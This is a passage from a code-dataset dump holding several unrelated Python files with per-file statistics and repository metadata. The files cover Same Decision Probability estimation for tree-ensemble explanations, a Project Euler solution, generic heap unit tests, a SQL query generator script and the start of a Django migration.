                    for leaf_numb_l in range(model.leaves_nb[l]):
                        leaf_id_l = model.leaf_idx_trees[l, leaf_numb_l]
                        value_b = model.values[b, leaf_id_b]
                        leaf_part_l = model.partition_leaves_trees[l][leaf_numb_l]
                        value_l = model.values[l, leaf_id_l]
                        leaf_bool = np.prod([(X[:, s] <= leaf_part_b[s, 1]) * (X[:, s] >= leaf_part_b[s, 0]) *
                                             (X[:, s] <= leaf_part_l[s, 1]) * (X[:, s] >= leaf_part_l[s, 0])
                                             for s in S], axis=0)
                        if np.sum(leaf_bool) == 0.:
                            continue
                        lm = np.prod([(data[:, s] <= leaf_part_b[s, 1]) * (data[:, s] >= leaf_part_b[s, 0]) *
                                      (data[:, s] <= leaf_part_l[s, 1]) * (data[:, s] >= leaf_part_l[s, 0])
                                      for s in index], axis=0)
                        for i, x in enumerate(X):
                            if leaf_bool[i] == 0:
                                continue
                            dist = (y_pred - fX[i]) ** 2
                            up_tx = np.array(dist > tX).reshape(-1)
                            down_tx = np.array(dist <= tX).reshape(-1)
                            p_s = np.prod([data[:, s] == x[s] for s in S], axis=0)
                            p_su = np.sum(p_s * up_tx)
                            p_sd = np.sum(p_s * down_tx)
                            p_ss = np.sum(p_s)
                            mean_forest[i, 0] += (np.sum(lm * p_s) * value_b * value_l) / (
                                p_ss) if p_ss != 0 else 0
                            mean_forest[i, 1] += (np.sum(lm * p_s * up_tx) * value_b * value_l) / (
                                p_su) if p_su != 0 else 0
                            mean_forest[i, 2] += (np.sum(lm * p_s * down_tx) * value_b * value_l) / (
                                p_sd) if p_sd != 0 else 0
    # Ratio (col1 - col0) / (col1 - col2), zero denominators mapped to 0,
    # then clipped into [0, 1].
    num = mean_forest[:, 1] - mean_forest[:, 0]
    den = mean_forest[:, 1] - mean_forest[:, 2]
    sdp = np.true_divide(num, den, out=np.zeros(N), where=den != 0)
    return sdp * (0 <= sdp) * (sdp <= 1) + np.ones(N) * (sdp > 1) + np.zeros(N) * (sdp < 0)
def compute_sdp_clf_cat(X, tX, model, S, data):
    """Same Decision Probability of a tree-ensemble *classifier*,
    categorical variant.

    For each row x of X, estimates the probability that the predicted class
    stays equal to argmax f(x) when the S features are fixed (exact equality,
    categorical) and the rest follow the background sample ``data``.

    Parameters:
        X (np.ndarray): instances to explain, shape (N, d).
        tX: unused here (kept for signature parity with the regression
            variants).
        model: tree-ensemble wrapper (see ``compute_sdp_reg``); ``predict``
            may return 1-D scores (binary) or per-class probabilities.
        S (list[int]): conditioning coalition.
        data (np.ndarray): background sample.

    Returns:
        np.ndarray of shape (N,): SDP estimates clipped into [0, 1].
    """
    N = X.shape[0]
    index = list(range(X.shape[1]))
    # Trivial coalitions handled up front.
    if len(S) == len(index):
        return np.ones(N)
    elif S == []:
        return np.zeros(N)
    n_trees = len(model.trees)
    y_pred = model.predict(data)
    fX = model.predict(X)
    # Binary models returning a single score column are expanded to the
    # two-column [1 - p, p] form before taking argmax.
    if len(y_pred.shape) == 1:
        y_pred = np.array([1 - y_pred, y_pred]).T
        fX = np.array([1 - fX, fX]).T
    argmax_y_pred = np.argmax(y_pred, axis=1)
    fX = np.argmax(fX, axis=1)
    # Accumulators per instance and class:
    # col 0 conditional mass, col 1 same-class mass, col 2 other-class mass.
    mean_forest = np.zeros((N, 3, model.values.shape[2]))
    for b in range(n_trees):
        leaves_tree = model.partition_leaves_trees[b]
        for leaf_numb in range(model.leaves_nb[b]):
            leaf_part = leaves_tree[leaf_numb]
            leaf_id = model.leaf_idx_trees[b, leaf_numb]
            value = model.values[b, leaf_id]
            # Instances whose S-features lie inside this leaf box.
            leaf_bool = np.prod([(X[:, s] <= leaf_part[s, 1]) * (X[:, s] >= leaf_part[s, 0]) for s in S], axis=0)
            if np.sum(leaf_bool) == 0:
                continue
            # Background rows inside the leaf on all features.
            lm = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in index], axis=0)
            for i, x in enumerate(X):
                if leaf_bool[i] == 0:
                    continue
                # Background rows predicted as the same / a different class.
                up_tx = np.array(argmax_y_pred == int(fX[i])).reshape(-1)
                down_tx = np.array(argmax_y_pred != int(fX[i])).reshape(-1)
                # Exact match of the categorical S features of x_i.
                p_s = np.prod([data[:, s] == x[s] for s in S], axis=0)
                p_su = np.sum(p_s * up_tx)
                p_sd = np.sum(p_s * down_tx)
                p_ss = np.sum(p_s)
                mean_forest[i, 0] += (np.sum(lm * p_s) * value) / p_ss if p_ss != 0 else 0
                mean_forest[i, 1] += (np.sum(lm * p_s * up_tx) * value) / p_su if p_su != 0 else 0
                mean_forest[i, 2] += (np.sum(lm * p_s * down_tx) * value) / p_sd if p_sd != 0 else 0
    # Ratio (col0 - col2) / (col1 - col2); pick the predicted class column,
    # map zero denominators to 0 and clip into [0, 1].
    num = mean_forest[:, 0] - mean_forest[:, 2]
    den = mean_forest[:, 1] - mean_forest[:, 2]
    sdp = np.true_divide(num, den, out=np.zeros_like(den), where=den != 0)
    sdp = np.array([sdp[i][int(fX[i])] for i in range(N)])
    return sdp * (0 <= sdp) * (sdp <= 1) + np.ones(N) * (sdp > 1) + np.zeros(N) * (sdp < 0)
def compute_sdp_clf(X, tX, model, S, data):
    """Same Decision Probability of a tree-ensemble *classifier*,
    continuous variant.

    Identical in structure to ``compute_sdp_clf_cat``, except the
    conditioning probability ``p_s`` uses leaf-interval membership of the
    S features (continuous data), so it is computed once per leaf instead of
    per instance.

    Parameters and return value: see ``compute_sdp_clf_cat``.
    """
    N = X.shape[0]
    index = list(range(X.shape[1]))
    # Trivial coalitions handled up front.
    if len(S) == len(index):
        return np.ones(N)
    elif S == []:
        return np.zeros(N)
    n_trees = len(model.trees)
    y_pred = model.predict(data)
    fX = model.predict(X)
    # Expand 1-D binary scores to the [1 - p, p] two-column form.
    if len(y_pred.shape) == 1:
        y_pred = np.array([1 - y_pred, y_pred]).T
        fX = np.array([1 - fX, fX]).T
    argmax_y_pred = np.argmax(y_pred, axis=1)
    fX = np.argmax(fX, axis=1)
    # Accumulators per instance and class:
    # col 0 conditional mass, col 1 same-class mass, col 2 other-class mass.
    mean_forest = np.zeros((N, 3, model.values.shape[2]))
    for b in range(n_trees):
        leaves_tree = model.partition_leaves_trees[b]
        for leaf_numb in range(model.leaves_nb[b]):
            leaf_part = leaves_tree[leaf_numb]
            leaf_id = model.leaf_idx_trees[b, leaf_numb]
            value = model.values[b, leaf_id]
            # Instances whose S-features lie inside this leaf box.
            leaf_bool = np.prod([(X[:, s] <= leaf_part[s, 1]) * (X[:, s] >= leaf_part[s, 0]) for s in S], axis=0)
            if np.sum(leaf_bool) == 0:
                continue
            # lm: background rows inside the leaf on all features;
            # p_s: background rows inside the leaf on S only (interval test).
            lm = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in index], axis=0)
            p_s = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in
                           S], axis=0)
            for i, x in enumerate(X):
                if leaf_bool[i] == 0:
                    continue
                # Background rows predicted as the same / a different class.
                up_tx = np.array(argmax_y_pred == int(fX[i])).reshape(-1)
                down_tx = np.array(argmax_y_pred != int(fX[i])).reshape(-1)
                p_su = np.sum(p_s * up_tx)
                p_sd = np.sum(p_s * down_tx)
                p_ss = np.sum(p_s)
                mean_forest[i, 0] += (np.sum(lm) * value) / p_ss if p_ss != 0 else 0
                mean_forest[i, 1] += (np.sum(lm * up_tx) * value) / p_su if p_su != 0 else 0
                mean_forest[i, 2] += (np.sum(lm * down_tx) * value) / p_sd if p_sd != 0 else 0
    # Ratio (col0 - col2) / (col1 - col2); pick the predicted class column,
    # map zero denominators to 0 and clip into [0, 1].
    num = mean_forest[:, 0] - mean_forest[:, 2]
    den = mean_forest[:, 1] - mean_forest[:, 2]
    sdp = np.true_divide(num, den, out=np.zeros_like(den), where=den != 0)
    sdp = np.array([sdp[i][int(fX[i])] for i in range(N)])
    sdp = sdp * (0 <= sdp) * (sdp <= 1) + np.ones(N) * (sdp > 1) + np.zeros(N) * (sdp < 0)
    return sdp
def single_msdp(x, S, model, rg_data):
    """Monte-Carlo Same Decision Probability of a single instance.

    Fixes the coalition ``S`` of ``x`` inside a copy of the background
    sample and returns the fraction of background rows on which the model
    repeats the prediction it made for ``x``.  When ``S`` covers every
    feature the probability is 1 by definition.
    """
    # (For an ACV tree one would take np.argmax over the class scores here.)
    predicted_for_x = model.predict(x.reshape(1, -1))
    n_features = x.shape[0]
    reference = rg_data.copy()
    reference[:, S] = x[S]
    if len(S) == n_features:
        return 1
    background_preds = model.predict(reference)
    return np.mean(background_preds == predicted_for_x)
def msdp_mthread(X, S, model, rg_data):
    """Process-pool version of ``msdp``: one task per row of X.

    Everything handed to the pool (model, background sample) must be
    picklable.  The pool is closed and joined before returning.
    """
    pool = Pool()
    per_row = partial(single_msdp, S=S, model=model, rg_data=rg_data)
    scores = np.array(pool.map(per_row, X))
    pool.close()
    pool.join()
    return scores
def msdp(X, S, model, rg_data):
    """Sequential SDP estimate for every row of X (see ``single_msdp``)."""
    per_row = (single_msdp(row, S, model, rg_data) for row in X)
    # fromiter with dtype=float matches the float64 output of the original
    # zeros-and-fill loop.
    return np.fromiter(per_row, dtype=float, count=X.shape[0])
def importance_msdp_clf_search(X, model, rg_data, C=[[]], minimal=1, global_proba=0.9, r_search_space=None, stop=True):
    """Search, per instance, for a minimal feature coalition whose MSDP
    reaches ``global_proba``, and accumulate global selection counts.

    Coalition sizes are explored in increasing order; an instance is removed
    from the active set once a coalition reaches the target probability.

    Parameters:
        X (np.ndarray): instances to explain, shape (N, d).
        model: estimator with a ``predict`` method (used through ``msdp``).
        rg_data (np.ndarray): background sample for the Monte-Carlo estimate.
        C (list[list[int]]): feature groups treated as atomic coalitions;
            ``[[]]`` means no grouping.  (Mutable default, but only read.)
        minimal (int): smallest coalition size to try.
        global_proba (float): SDP level a coalition must reach.
        r_search_space (list[int] | None): restrict the search to these
            feature indices; None means all features.
        stop (bool): stop once every instance is explained or the coalition
            size exceeds d / 2.

    Returns:
        tuple: (sdp_global, s_star, len_s_star, sdp) where
            sdp_global (d,) is the per-feature selection frequency,
            s_star (N, d) the per-instance coalition padded with -1,
            len_s_star (N,) the coalition sizes and
            sdp (N,) the best SDP reached per instance.
    """
    N = X.shape[0]
    m = X.shape[1]
    sdp = np.zeros((N))
    sdp_global = np.zeros((m))
    # Fix: np.int / np.long were removed from NumPy (deprecated in 1.20,
    # gone in 1.24); use the explicit fixed-width dtype instead.
    len_s_star = np.zeros((N), dtype=np.int64)
    R, r = [], []
    for i in range(N):
        R.append(i)
    R_buf = np.zeros((N), dtype=np.int64)
    if r_search_space is None:  # identity test instead of `== None`
        search_space = [i for i in range(m)]
    else:
        search_space = r_search_space.copy()
    if C[0] != []:
        # Drop grouped features from the singleton candidates, then re-add
        # each group that intersects the search space as one atomic unit.
        remove_va = [C[ci][cj] for ci in range(len(C)) for cj in range(len(C[ci]))]
        va_id = [[i] for i in search_space if i not in remove_va]
        for ci in range(len(C)):
            i = 0
            for cj in range(len(C[ci])):
                if C[ci][cj] in search_space:
                    i += 1
                    break
            if i != 0:
                va_id += [C[ci]]
    else:
        va_id = [[i] for i in search_space]
    m = len(va_id)
    # Enumerate coalitions by size, capped at 2**15 subsets in total.
    power = []
    max_size = 0
    for size in range(m + 1):
        power_b = []
        for co in itertools.combinations(va_id, size):
            power_b.append(np.array(sum(list(co), [])))
            max_size += 1
        power.append(power_b)
        if max_size >= 2 ** 15:
            break
    power_cpp = power
    s_star = -1 * np.ones((N, X.shape[1]), dtype=np.int64)
    S = np.zeros((X.shape[1]), dtype=np.int64)
    for s_0 in tqdm(range(minimal, m + 1)):
        for s_1 in range(0, len(power_cpp[s_0])):
            for i in range(len(power_cpp[s_0][s_1])):
                S[i] = power_cpp[s_0][s_1][i]
            S_size = len(power_cpp[s_0][s_1])
            r = []
            N = len(R)
            for i in range(N):
                R_buf[i] = R[i]
            sdp_b = msdp(X, S[:S_size], model, rg_data)
            # Keep the best coalition seen so far for each active instance.
            for i in range(N):
                if sdp_b[R_buf[i]] >= sdp[R_buf[i]]:
                    sdp[R_buf[i]] = sdp_b[R_buf[i]]
                    len_s_star[R_buf[i]] = S_size
                    for s in range(S_size):
                        s_star[R_buf[i], s] = S[s]
                if S_size == X.shape[1]:
                    # The full coalition always explains the prediction.
                    sdp[R_buf[i]] = 1
                    len_s_star[R_buf[i]] = S_size
                    for s in range(S_size):
                        s_star[R_buf[i], s] = S[s]
            # Retire instances whose SDP reached the target and count their
            # selected features into the global importance tally.
            for i in range(N):
                if sdp[R_buf[i]] >= global_proba:
                    r.append(R[i])
                    for s in range(len_s_star[R_buf[i]], X.shape[1]):  # to filter (important for coalition)
                        s_star[R_buf[i], s] = -1
                    for s in range(len_s_star[R_buf[i]]):
                        sdp_global[s_star[R_buf[i], s]] += 1
            for i in range(len(r)):
                R.remove(r[i])
        if (len(R) == 0 or S_size >= X.shape[1] / 2) and stop:
            break
    return (np.asarray(sdp_global) / X.shape[0], np.array(s_star, dtype=np.int64),
            np.array(len_s_star, dtype=np.int64), np.array(sdp))
def single_msdp_reg(x, S, model, rg_data, threshold=0.2):
    """Monte-Carlo Same Decision Probability of one instance, regressor case.

    A background row counts as "same decision" when its prediction lies
    within ``threshold`` (absolute error) of the prediction for ``x``.
    Returns 1 when ``S`` covers every feature.
    """
    predicted_for_x = model.predict(x.reshape(1, -1))
    n_features = x.shape[0]
    reference = rg_data.copy()
    reference[:, S] = x[S]
    if len(S) == n_features:
        return 1
    background_preds = model.predict(reference)
    return np.mean(np.abs(background_preds - predicted_for_x) <= threshold)
def msdp_reg_mthread(X, S, model, rg_data, threshold=0.2):
    """Process-pool version of ``msdp_reg``: one task per row of X.

    Everything handed to the pool must be picklable.  The pool is closed
    and joined before returning.
    """
    pool = Pool()
    per_row = partial(single_msdp_reg, S=S, model=model, rg_data=rg_data, threshold=threshold)
    scores = np.array(pool.map(per_row, X))
    pool.close()
    pool.join()
    return scores
def msdp_reg(X, S, model, rg_data, threshold=0.2):
    """Sequential SDP estimate for every row of X (see ``single_msdp_reg``)."""
    per_row = (single_msdp_reg(row, S, model, rg_data, threshold) for row in X)
    # fromiter with dtype=float matches the float64 output of the original
    # zeros-and-fill loop.
    return np.fromiter(per_row, dtype=float, count=X.shape[0])
def importance_msdp_reg_search(X, model, rg_data, C=[[]], minimal=1, global_proba=0.9, threshold=0.2, r_search_space=None, stop=True):
    """Regression counterpart of ``importance_msdp_clf_search``.

    Searches, per instance, for a minimal feature coalition whose MSDP
    (within absolute error ``threshold``) reaches ``global_proba`` and
    accumulates global selection counts.

    Parameters:
        X (np.ndarray): instances to explain, shape (N, d).
        model: estimator with a ``predict`` method (used through ``msdp_reg``).
        rg_data (np.ndarray): background sample for the Monte-Carlo estimate.
        C (list[list[int]]): feature groups treated as atomic coalitions;
            ``[[]]`` means no grouping.  (Mutable default, but only read.)
        minimal (int): smallest coalition size to try.
        global_proba (float): SDP level a coalition must reach.
        threshold (float): absolute-error tolerance for "same decision".
        r_search_space (list[int] | None): restrict the search to these
            feature indices; None means all features.
        stop (bool): stop once every instance is explained or the coalition
            size exceeds d / 2.

    Returns:
        tuple: (sdp_global, s_star, len_s_star, sdp) — see
        ``importance_msdp_clf_search``.
    """
    N = X.shape[0]
    m = X.shape[1]
    sdp = np.zeros((N))
    sdp_global = np.zeros((m))
    # Fix: np.int / np.long were removed from NumPy (deprecated in 1.20,
    # gone in 1.24); use the explicit fixed-width dtype instead.
    len_s_star = np.zeros((N), dtype=np.int64)
    R, r = [], []
    for i in range(N):
        R.append(i)
    R_buf = np.zeros((N), dtype=np.int64)
    if r_search_space is None:  # identity test instead of `== None`
        search_space = [i for i in range(m)]
    else:
        search_space = r_search_space.copy()
    if C[0] != []:
        # Drop grouped features from the singleton candidates, then re-add
        # each group that intersects the search space as one atomic unit.
        remove_va = [C[ci][cj] for ci in range(len(C)) for cj in range(len(C[ci]))]
        va_id = [[i] for i in search_space if i not in remove_va]
        for ci in range(len(C)):
            i = 0
            for cj in range(len(C[ci])):
                if C[ci][cj] in search_space:
                    i += 1
                    break
            if i != 0:
                va_id += [C[ci]]
    else:
        va_id = [[i] for i in search_space]
    m = len(va_id)
    # Enumerate coalitions by size, capped at 2**15 subsets in total.
    power = []
    max_size = 0
    for size in range(m + 1):
        power_b = []
        for co in itertools.combinations(va_id, size):
            power_b.append(np.array(sum(list(co), [])))
            max_size += 1
        power.append(power_b)
        if max_size >= 2 ** 15:
            break
    power_cpp = power
    s_star = -1 * np.ones((N, X.shape[1]), dtype=np.int64)
    S = np.zeros((X.shape[1]), dtype=np.int64)
    for s_0 in tqdm(range(minimal, m + 1)):
        for s_1 in range(0, len(power_cpp[s_0])):
            for i in range(len(power_cpp[s_0][s_1])):
                S[i] = power_cpp[s_0][s_1][i]
            S_size = len(power_cpp[s_0][s_1])
            r = []
            N = len(R)
            for i in range(N):
                R_buf[i] = R[i]
            sdp_b = msdp_reg(X, S[:S_size], model, rg_data, threshold)
            # Keep the best coalition seen so far for each active instance.
            for i in range(N):
                if sdp_b[R_buf[i]] >= sdp[R_buf[i]]:
                    sdp[R_buf[i]] = sdp_b[R_buf[i]]
                    len_s_star[R_buf[i]] = S_size
                    for s in range(S_size):
                        s_star[R_buf[i], s] = S[s]
                if S_size == X.shape[1]:
                    # The full coalition always explains the prediction.
                    sdp[R_buf[i]] = 1
                    len_s_star[R_buf[i]] = S_size
                    for s in range(S_size):
                        s_star[R_buf[i], s] = S[s]
            # Retire instances whose SDP reached the target and count their
            # selected features into the global importance tally.
            for i in range(N):
                if sdp[R_buf[i]] >= global_proba:
                    r.append(R[i])
                    for s in range(len_s_star[R_buf[i]], X.shape[1]):  # to filter (important for coalition)
                        s_star[R_buf[i], s] = -1
                    for s in range(len_s_star[R_buf[i]]):
                        sdp_global[s_star[R_buf[i], s]] += 1
            for i in range(len(r)):
                R.remove(r[i])
        if (len(R) == 0 or S_size >= X.shape[1] / 2) and stop:
            break
    return (np.asarray(sdp_global) / X.shape[0], np.array(s_star, dtype=np.int64),
            np.array(len_s_star, dtype=np.int64), np.array(sdp))
| 37.945455 | 134 | 0.450843 | 3,473 | 22,957 | 2.784336 | 0.039159 | 0.037642 | 0.037229 | 0.032265 | 0.967632 | 0.96122 | 0.944054 | 0.940331 | 0.927198 | 0.919338 | 0 | 0.024019 | 0.401533 | 22,957 | 604 | 135 | 38.008278 | 0.679817 | 0.015943 | 0 | 0.887417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02649 | false | 0 | 0.015453 | 0 | 0.090508 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
918adb2fe21d4587d6dfea6363d48258fd5267f4 | 1,229 | py | Python | solved/8.py | back-yard/euler | 3527f92f661a7767b22cf7fe8c50db542c6a9d99 | [
"MIT"
] | null | null | null | solved/8.py | back-yard/euler | 3527f92f661a7767b22cf7fe8c50db542c6a9d99 | [
"MIT"
] | null | null | null | solved/8.py | back-yard/euler | 3527f92f661a7767b22cf7fe8c50db542c6a9d99 | [
"MIT"
] | null | null | null | # https://projecteuler.net/problem=8
num = """
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
"""
num = num.replace('\n', '').strip()
print max([reduce(lambda x, y: x*y, [int(i) for i in item]) for item in [num[i:i + 13] for i in range(len(num) - 13)]])
| 43.892857 | 119 | 0.913751 | 59 | 1,229 | 19.033898 | 0.728814 | 0.003562 | 0.010686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.855319 | 0.043938 | 1,229 | 27 | 120 | 45.518519 | 0.100426 | 0.027665 | 0 | 0 | 0 | 0 | 0.857502 | 0.838223 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.041667 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9196f5473fbeedf0c981fe178851f643cf1978cb | 95 | py | Python | karabo/util/__init__.py | i4Ds/Karabo-Pipeline | c9a7f120b08b56af93bb953e284b33c107fd865c | [
"MIT"
] | null | null | null | karabo/util/__init__.py | i4Ds/Karabo-Pipeline | c9a7f120b08b56af93bb953e284b33c107fd865c | [
"MIT"
] | 42 | 2022-01-27T14:12:46.000Z | 2022-03-31T14:21:26.000Z | karabo/util/__init__.py | i4Ds/Karabo-Pipeline | c9a7f120b08b56af93bb953e284b33c107fd865c | [
"MIT"
] | null | null | null | from karabo.util.jupyter import set_rascil_data_directory_env
set_rascil_data_directory_env()
| 23.75 | 61 | 0.894737 | 15 | 95 | 5.133333 | 0.666667 | 0.233766 | 0.337662 | 0.571429 | 0.649351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063158 | 95 | 3 | 62 | 31.666667 | 0.865169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
37d630701d9ecc0e08f6887a591810126dcda169 | 4,550 | py | Python | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/projects-DS/Data-Structures/heap/test_generic_heap.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 5 | 2021-06-02T23:44:25.000Z | 2021-12-27T16:21:57.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/projects-DS/Data-Structures/heap/test_generic_heap.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 22 | 2021-05-31T01:33:25.000Z | 2021-10-18T18:32:39.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/projects-DS/Data-Structures/heap/test_generic_heap.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 3 | 2021-06-19T03:37:47.000Z | 2021-08-31T00:49:51.000Z | import unittest
from unittest.mock import MagicMock
from generic_heap import Heap
class HeapTests(unittest.TestCase):
    """Behavioral tests for Heap: default (max) comparator, a custom min
    comparator, and the internal sift/bubble helpers."""

    # Insertion sequence shared by the insert/priority scenarios.
    PRIORITY_VALUES = (6, 8, 10, 9, 1, 9, 9, 5)
    # Insertion sequence shared by the full-drain scenarios.
    DRAIN_VALUES = (6, 7, 5, 8, 10, 1, 2, 5)

    def setUp(self):
        self.heap = Heap()

    def _fill(self, values):
        # Insert the values one by one, preserving the given order.
        for value in values:
            self.heap.insert(value)

    def _drain(self):
        # Delete until empty, collecting values in removal order.
        removed = []
        while self.heap.get_size() > 0:
            removed.append(self.heap.delete())
        return removed

    def test_default_heap_insert_works(self):
        self._fill(self.PRIORITY_VALUES)
        self.assertEqual(self.heap.storage, [10, 9, 9, 6, 1, 8, 9, 5])

    def test_default_get_priority_works(self):
        self._fill(self.PRIORITY_VALUES)
        self.assertEqual(self.heap.get_size(), 8)
        self.assertEqual(self.heap.get_priority(), 10)

    def test_default_get_priority_after_delete(self):
        self._fill(self.PRIORITY_VALUES)
        for expected in (9, 9, 9, 8, 6):
            self.heap.delete()
            self.assertEqual(self.heap.get_priority(), expected)

    def test_default_delete_elements_in_order(self):
        self._fill(self.DRAIN_VALUES)
        self.assertEqual(self._drain(), [10, 8, 7, 6, 5, 5, 2, 1])

    def test_custom_heap_insert_works(self):
        self.heap = Heap(lambda x, y: x < y)
        self._fill(self.PRIORITY_VALUES)
        self.assertEqual(self.heap.storage, [1, 5, 9, 6, 8, 10, 9, 9])

    def test_custom_get_priority_works(self):
        self.heap = Heap(lambda x, y: x < y)
        self._fill(self.PRIORITY_VALUES)
        self.assertEqual(self.heap.get_size(), 8)
        self.assertEqual(self.heap.get_priority(), 1)

    def test_custom_get_priority_after_delete(self):
        self.heap = Heap(lambda x, y: x < y)
        self._fill(self.PRIORITY_VALUES)
        for expected in (5, 6, 8, 9, 9):
            self.heap.delete()
            self.assertEqual(self.heap.get_priority(), expected)

    def test_custom_delete_elements_in_order(self):
        self.heap = Heap(lambda x, y: x < y)
        self._fill(self.DRAIN_VALUES)
        self.assertEqual(self._drain(), [1, 2, 5, 5, 6, 7, 8, 10])

    def test_bubble_up_was_called(self):
        self.heap._bubble_up = MagicMock()
        self.heap.insert(5)
        self.assertTrue(self.heap._bubble_up.called)

    def test_sift_down_was_called(self):
        self.heap._sift_down = MagicMock()
        self.heap.insert(10)
        self.heap.insert(11)
        self.heap.delete()
        self.assertTrue(self.heap._sift_down.called)
# Allow running the test module directly: `python test_generic_heap.py`.
if __name__ == "__main__":
    unittest.main()
| 29.738562 | 70 | 0.6 | 634 | 4,550 | 4.175079 | 0.086751 | 0.323385 | 0.354363 | 0.102002 | 0.828485 | 0.78504 | 0.769173 | 0.675482 | 0.673971 | 0.673971 | 0 | 0.038899 | 0.265495 | 4,550 | 152 | 71 | 29.934211 | 0.753142 | 0 | 0 | 0.734375 | 0 | 0 | 0.001758 | 0 | 0 | 0 | 0 | 0 | 0.15625 | 1 | 0.085938 | false | 0 | 0.023438 | 0 | 0.117188 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
37d8b74c7083900d5a16923a131788ac71457a0a | 703 | py | Python | generates_sql/bfsout_make_queries_per_year.py | zhuowei/FamilinxAnalysis | 333b24eb173b6d070d7f824024ee6ca0f8a60b2c | [
"MIT"
] | 2 | 2019-01-25T13:46:56.000Z | 2020-11-26T13:55:29.000Z | generates_sql/bfsout_make_queries_per_year.py | zhuowei/FamilinxAnalysis | 333b24eb173b6d070d7f824024ee6ca0f8a60b2c | [
"MIT"
] | null | null | null | generates_sql/bfsout_make_queries_per_year.py | zhuowei/FamilinxAnalysis | 333b24eb173b6d070d7f824024ee6ca0f8a60b2c | [
"MIT"
] | null | null | null | for i in range(1800, 1900):
basic_query = "select count(1) from profiles_bfsjoined where birth_year is not null and death_year is not null and birth_year > 1700 and birth_year <= {} and death_year >= {}".format(i, i)
print(basic_query + ";")
#print(basic_query + " and gender = 'male';")
#print(basic_query + " and gender = 'female';")
for i in range(1900, 2011):
basic_query = "select count(1) from profiles_bfsjoined where birth_year is not null and birth_year > 1700 and birth_year <= {} and ((death_year is not null and death_year >= {}) or is_alive = true)".format(i, i)
print(basic_query + ";")
#print(basic_query + " and gender = 'male';")
#print(basic_query + " and gender = 'female';")
| 63.909091 | 212 | 0.694168 | 112 | 703 | 4.169643 | 0.285714 | 0.171306 | 0.192719 | 0.111349 | 0.890792 | 0.890792 | 0.890792 | 0.835118 | 0.835118 | 0.835118 | 0 | 0.044143 | 0.162162 | 703 | 10 | 213 | 70.3 | 0.748727 | 0.256046 | 0 | 0.333333 | 0 | 0.333333 | 0.660886 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
37e49d4e979c938a94f7064b82893d6014c3cdb6 | 36,698 | py | Python | bmcore/migrations/0005_auto_20171028_1329.py | hchockarprasad/bmdjango | a978e4bca264eaa5a1f21df332f7da06f9f69ee5 | [
"MIT"
] | 3 | 2017-10-29T13:37:58.000Z | 2017-11-06T15:31:35.000Z | bmcore/migrations/0005_auto_20171028_1329.py | hchockarprasad/bmdjango | a978e4bca264eaa5a1f21df332f7da06f9f69ee5 | [
"MIT"
] | null | null | null | bmcore/migrations/0005_auto_20171028_1329.py | hchockarprasad/bmdjango | a978e4bca264eaa5a1f21df332f7da06f9f69ee5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-28 07:59
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
